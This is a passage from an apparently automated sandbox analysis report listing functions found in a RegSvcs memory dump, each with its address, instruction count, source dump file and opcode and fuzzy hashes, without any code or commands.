                                                                  • Instruction ID: cc699f52d318e63a2c7fc16c90430d041054f1003839c4c6dcbbe72426bd0f73
                                                                  • Opcode Fuzzy Hash: 0208e17e9a32721fa5e31180883b3b3b76cf0c89a24a4ea8ec3441b8ed548cc6
                                                                  • Instruction Fuzzy Hash: 453158B15412119BDB21AF58CC44B7877B9AF40314F54C2ADE9868B382EB349C82CF90
                                                                  Function 0174C3CD Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                  • Instruction ID: 5eea16c85a274b70bf6307b06f030837bae53975e7beff00cdd55b44c1a47637
                                                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                  • Instruction Fuzzy Hash: 00210836601652A7CB16ABD98D04ABAFFB5EF50610F40801EFB958B691F734D940C760
                                                                  Function 0168E420 Relevance: .1, Instructions: 88COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b26c45b7bf4e69606441a16eafc8e009a3a1729ed18788813130172a766aabba
                                                                  • Instruction ID: 4e42421971fa59e27d4fa459cb97f4e3caf5b9fae2b3bbe840e4de86fc193e5a
                                                                  • Opcode Fuzzy Hash: b26c45b7bf4e69606441a16eafc8e009a3a1729ed18788813130172a766aabba
                                                                  • Instruction Fuzzy Hash: CC313B31A4112C9BDB31EF18CC41FEEB7BAEB15740F0002A5E649A7290D7759E81CFA1
                                                                  Function 016C4588 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                  • Instruction ID: c9959ccd7fd9d25e4a701badf25918ba3cdcf3408384e9875a3f00edee81184d
                                                                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                  • Instruction Fuzzy Hash: 38217131A00619EBCB15CF59C990A9EBBB5FF48B14F10806DEE159B246DA71EE05CB90
                                                                  Function 016C44B0 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ab95709e3af113b339e796bb359e95d40c1cc7ef93082939dbc8269260ce48c
                                                                  • Instruction ID: c0a43500d2c71f5752db48db0ad3e908e5691b6bef70d9a84000603c7109517a
                                                                  • Opcode Fuzzy Hash: 3ab95709e3af113b339e796bb359e95d40c1cc7ef93082939dbc8269260ce48c
                                                                  • Instruction Fuzzy Hash: 1221A0726087459BC722CF58CC90B6BB7E5FB98B60F41451DFD549B641DB30E901CBA2
                                                                  Function 0168E388 Relevance: .1, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                  • Instruction ID: 628f8a27a1459e9bd9ff9840c378c3a4d7723f5fe5af7e455e6c6abcaa863744
                                                                  • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                  • Instruction Fuzzy Hash: 56316931601605EFD721EBA8CD84F6AB7FAEF85354F1046A9E5568B390E770EE02CB50
                                                                  Function 0170E609 Relevance: .1, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d3954e7f621cbb1605fb87de732d8a913c535eca49b8bbcb9731ad7778b88281
                                                                  • Instruction ID: 819967a86910058745461f8beceecec9e4a39ed24164e890b3a6a3eb71e9bd8b
                                                                  • Opcode Fuzzy Hash: d3954e7f621cbb1605fb87de732d8a913c535eca49b8bbcb9731ad7778b88281
                                                                  • Instruction Fuzzy Hash: D5317C75A00205EFCB15CF18D884DAEB7F6EF84304B154869F80A9B391EB71EA50CB94
                                                                  Function 017106F1 Relevance: .1, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dc8c2647b09c915291a7689bdfa14f59c548547136ce817a09de60a6579aab02
                                                                  • Instruction ID: 028856c687a185d23c38509196bcb3cfa8ed3cfc582e100abb0678e8648f0b65
                                                                  • Opcode Fuzzy Hash: dc8c2647b09c915291a7689bdfa14f59c548547136ce817a09de60a6579aab02
                                                                  • Instruction Fuzzy Hash: 0B218D71900229ABCF20DF59C881ABEB7F9FF48740B544069F941AB254D738AD42CFA4
                                                                  Function 0171019F Relevance: .1, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 83a05e97432ad945eab7b251209f0ef02d3f3c3bdf76c6f31238812e62c478b4
                                                                  • Instruction ID: 6bdef2be784caf37ab97fcb0f2be16b162b65f01e9680ac3d2e4b3bbc7c394ea
                                                                  • Opcode Fuzzy Hash: 83a05e97432ad945eab7b251209f0ef02d3f3c3bdf76c6f31238812e62c478b4
                                                                  • Instruction Fuzzy Hash: A521AB71A00605AFD715DBACCD44E6AB7A8FF58740F144069F904DB790E638ED40CBA8
                                                                  Function 01710283 Relevance: .1, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30ef6831be93e00ae53971ce801ba1fb2e840dcf1583fb055f33fd4d4f70662d
                                                                  • Instruction ID: db6fcdb20313fbfa71582d192b8aed2451f15d7490b1948e6f71ce6004d4ca27
                                                                  • Opcode Fuzzy Hash: 30ef6831be93e00ae53971ce801ba1fb2e840dcf1583fb055f33fd4d4f70662d
                                                                  • Instruction Fuzzy Hash: E821AF729042469FD711EF5DCD44BABFBECAF90640F08445AB980C7255D734D984C6A2
                                                                  Function 016B2835 Relevance: .1, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4f52878b0430a3fdabc9c4c93eda99c7efb83b464add22cac9fee4eb7a50d4c7
                                                                  • Instruction ID: 5020eb08e5669fa316ddc73d6f5ae43652144714da5f226e8a6c383553fbdfad
                                                                  • Opcode Fuzzy Hash: 4f52878b0430a3fdabc9c4c93eda99c7efb83b464add22cac9fee4eb7a50d4c7
                                                                  • Instruction Fuzzy Hash: 45214932704681DBE32267AC8D54B647BC5AF01B70F2903ACFB259B7E2D768D8428340
                                                                  Function 016CA30B Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: be545d391cd6980448f7c3b62aaaf9452008fc6b8c8604a4180837919b17c7cd
                                                                  • Instruction ID: 85118338c11956d5a71a9ae65e9915ce3e7c0144e0a704521cedab7d5d54a373
                                                                  • Opcode Fuzzy Hash: be545d391cd6980448f7c3b62aaaf9452008fc6b8c8604a4180837919b17c7cd
                                                                  • Instruction Fuzzy Hash: 36219875240A01AFC725DF69CC10B56B7E6FF08B04F24846CA50ACBB62E371E842CF98
                                                                  Function 0174A49A Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2bea2690339461d7070086d055d96cc366593b97004f91b4f2fe3944abf623c0
                                                                  • Instruction ID: 961fba833e647425735447df34a6a8d8c635e4c77f7ec0423203f1ad2371954a
                                                                  • Opcode Fuzzy Hash: 2bea2690339461d7070086d055d96cc366593b97004f91b4f2fe3944abf623c0
                                                                  • Instruction Fuzzy Hash: A71106727C0B11BFE72256699C11F2BF69EDBD4B60F210428B71ACB290EB60DC0187D5
                                                                  Function 01710946 Relevance: .1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f9742e99fb388ed85bcaef94e831b40e49131202756907767469b86f96520e74
                                                                  • Instruction ID: 194b2a43e11ace7b120b2cf30ea7966138aa2b76e3ddbd98f0a3b54f9c687ec9
                                                                  • Opcode Fuzzy Hash: f9742e99fb388ed85bcaef94e831b40e49131202756907767469b86f96520e74
                                                                  • Instruction Fuzzy Hash: 5521E6B1E40349AFCB20DFAAD8949AEFBF9FF98710F10012FE505A7254DA709941CB64
                                                                  Function 017280A8 Relevance: .1, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                  • Instruction ID: 783601764f234e744b51b44ecacf1919edcb613c5b882bf8960ccae96db11069
                                                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                  • Instruction Fuzzy Hash: 16216A72A00219AFDB129F98CC40BAEBBFAEF98310F244459F901A7291E735DD529B50
                                                                  Function 016C0124 Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                  • Instruction ID: 1b4a3c2c069b719caa9da40cc205b272892a0c594a8c43e18eecb2fda09ee65f
                                                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                  • Instruction Fuzzy Hash: 2911EF77601605FFE722AF89CC41FAABBB9EB80B55F10402DF6008B280D671ED44CB64
                                                                  Function 01698770 Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b3fd0d4aeef23eca1eee303032d452fc976ea3cd45ee216861b33667c5f42396
                                                                  • Instruction ID: ff55d255cc7bb719d86021e8c5f15cfeb7c13b60fd3970217f7a8adc5ad9cca2
                                                                  • Opcode Fuzzy Hash: b3fd0d4aeef23eca1eee303032d452fc976ea3cd45ee216861b33667c5f42396
                                                                  • Instruction Fuzzy Hash: 3E119D717016199B9F11CF4DC980ABEBBEDAF4B710B19806EEE089F305D7B2D9018790
                                                                  Function 016CAAEE Relevance: .1, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                  • Instruction ID: ecf457421285e405beae3cb70ce47cb5c8191faa287a1a1d7bde287e51286832
                                                                  • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                  • Instruction Fuzzy Hash: 3D217972600A49DFD7268F89C940A76FBE6EB94F10F14883DE54A87710E730EC01CB90
                                                                  Function 016980E9 Relevance: .1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4110f416dff0989dac5d0aa5af2942d56b6c6a06772882a6c909c06b629383a2
                                                                  • Instruction ID: 8e713551f6914ed5ccb8bb3129fc536c57a444239d4c74967f607741d085a7b2
                                                                  • Opcode Fuzzy Hash: 4110f416dff0989dac5d0aa5af2942d56b6c6a06772882a6c909c06b629383a2
                                                                  • Instruction Fuzzy Hash: C6218E75A4020ADFCB14CF98C981AAEBBF9FB89319F24416DD105AB311CB71AD06CBD0
                                                                  Function 016C674D Relevance: .1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5adb4f8771e1d9ee7f5d87fd8ced58c3498e43da53b37a30b99e2190157946a6
                                                                  • Instruction ID: 1725cbc9fa8ab2ea696240e3bd80a88d7430b9944053e0be8885f625e50bf63d
                                                                  • Opcode Fuzzy Hash: 5adb4f8771e1d9ee7f5d87fd8ced58c3498e43da53b37a30b99e2190157946a6
                                                                  • Instruction Fuzzy Hash: 5D216A71601A01EFD7208F68CC80B76B7E9FF44A50F40882DE6AAC7751EB70E841CB68
                                                                  Function 01726870 Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5ec2f00d5ae4d2659511678bd1ad03e5d465adaa92bc1506f3ae4ff3325c0024
                                                                  • Instruction ID: 8b3de230552fe8410fa4027866d607f3646227f0a9d0ba7fe25bd5ba5e06366d
                                                                  • Opcode Fuzzy Hash: 5ec2f00d5ae4d2659511678bd1ad03e5d465adaa92bc1506f3ae4ff3325c0024
                                                                  • Instruction Fuzzy Hash: 1A119172380524EFC722DB59CD40F9AB7A9EB55760F11406AFA45DB251DA70E902CBA0
                                                                  Function 016BE8C0 Relevance: .1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86bb464ce5c261f61e94b1226a4b1330bcab2e552576b67480e2a3631a457652
                                                                  • Instruction ID: 2ff03d67c2db291b9a7ab8785d5d446f39d8ec4b0b0c180d8a356ea8a206bd20
                                                                  • Opcode Fuzzy Hash: 86bb464ce5c261f61e94b1226a4b1330bcab2e552576b67480e2a3631a457652
                                                                  • Instruction Fuzzy Hash: 5A11E533204114ABCB19EA29CC95AABB357EBD5270B25453DEA228B391EA319846C794
                                                                  Function 016C66B0 Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a9888cc3c90ff34750e1ea1dbbe6e446c94b00fb933a31633e38da49d0761f78
                                                                  • Instruction ID: d415949679beb1fe593e04b5292dc37526f5533d45d37b693c0b36344c70aa79
                                                                  • Opcode Fuzzy Hash: a9888cc3c90ff34750e1ea1dbbe6e446c94b00fb933a31633e38da49d0761f78
                                                                  • Instruction Fuzzy Hash: 9B11BF76A01245EFCB25DF99C980A7ABBE5EF84A10B11847DE9059B311E730DD00CBA8
                                                                  Function 0175A8E4 Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                  • Instruction ID: 7f4c825bfb5b6c41b9dc6bc2dbeb77bdcb9b297dbbf1003e9b43db5f78646a06
                                                                  • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                  • Instruction Fuzzy Hash: 1B11C436A00915EFDB19CB58CC05B9DFBB5EF84210F058269EC5597344E771AE51CBD0
                                                                  Function 01690AD0 Relevance: .1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                  • Instruction ID: 8cf10fa11af1294f5b0b58d28bc0caf19671b534562631a195430525ea97e789
                                                                  • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                  • Instruction Fuzzy Hash: B321F7B5A00B059FD3A0CF29D440B52BBF4FB48720F10492EE98AC7B40E371E814CB94
                                                                  Function 0171E7E1 Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                  • Instruction ID: f498b720369686f437a5397849b74dd1f84f37e8aa97b1c8530a917bd34b5307
                                                                  • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                  • Instruction Fuzzy Hash: A3119E32640601EFEB229F4CC844B5AFBA6EF45754F05942CEE099B168DF31DC40DB90
                                                                  Function 016B27ED Relevance: .1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d5612d8ad01adb9094c414cc21d4527b5a7c069bfecaaf05912946d65443d7d
                                                                  • Instruction ID: aa63daf0e0dbc26a5d0e19d801dac56d4c030160d421d81e179dcaff459378fe
                                                                  • Opcode Fuzzy Hash: 0d5612d8ad01adb9094c414cc21d4527b5a7c069bfecaaf05912946d65443d7d
                                                                  • Instruction Fuzzy Hash: 67012672205645ABE316A2ADDC98F67BBCDEF40790F0600ACFA048B390DA14EC41C3A1
                                                                  Function 01694690 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 498831adefaaed5ad7b7786b93c891e46103f0d306939abb0df31f9418d48773
                                                                  • Instruction ID: 0ca87a40bbc136e8125a3ebe37c79a0263933620dd63caeffb326ec187a902ca
                                                                  • Opcode Fuzzy Hash: 498831adefaaed5ad7b7786b93c891e46103f0d306939abb0df31f9418d48773
                                                                  • Instruction Fuzzy Hash: 8011C236250649AFDF25CF59DE40F6A7BADEB8A764F004119F9058B350CB71E802CF60
                                                                  Function 01764B00 Relevance: .1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ef11284340381366b97e9150d440f15457090516f45b90ea5fc83d96a59ab6d
                                                                  • Instruction ID: 65eacba73d66392761c880824c881f38db1c48aa642b8ffe7b4089849c158f38
                                                                  • Opcode Fuzzy Hash: 6ef11284340381366b97e9150d440f15457090516f45b90ea5fc83d96a59ab6d
                                                                  • Instruction Fuzzy Hash: 4011C2362006119FD7229A69DC44F6BF7AAFFC4710F194429EE4B87694DA30A806CB90
                                                                  Function 016C6620 Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d82fcb6eede2aedd014a980fe87d2866e589ec06a9f732d68baf3644c0fff0f
                                                                  • Instruction ID: dfd4d3cfca0beb771ceed7fa7034c2bf2539cad51971d9b45aa6784a1660e1bb
                                                                  • Opcode Fuzzy Hash: 2d82fcb6eede2aedd014a980fe87d2866e589ec06a9f732d68baf3644c0fff0f
                                                                  • Instruction Fuzzy Hash: B2118672900625ABDB21DF5ACD80B6EFBB9EF44B50F54045DDA05A7301D730AD018B59
                                                                  Function 016BEA2E Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3fc03e5b6edd619ce943fc780ebca0e264d2e02823275d629034b6d3958722a
                                                                  • Instruction ID: f606884e6bf584d4f8503d93d847c28bfe8b9ea4e8e9b3010cca743b317a8973
                                                                  • Opcode Fuzzy Hash: a3fc03e5b6edd619ce943fc780ebca0e264d2e02823275d629034b6d3958722a
                                                                  • Instruction Fuzzy Hash: DF01D27550010A9FC725DF19D884F96BBFEEB81324F21816EE4058B361C7709C82CF94
                                                                  Function 016BE53E Relevance: .1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                  • Instruction ID: 3c2b3bd92874419077f986ecf88118b858d7710e3c848f358836287e6d36c105
                                                                  • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                  • Instruction Fuzzy Hash: 07118E732016C2DBE722976C8D94BA57B94AB41758F1900E8EF419B792F72AC882C760
                                                                  Function 0171E75D Relevance: .1, Instructions: 54COMMON
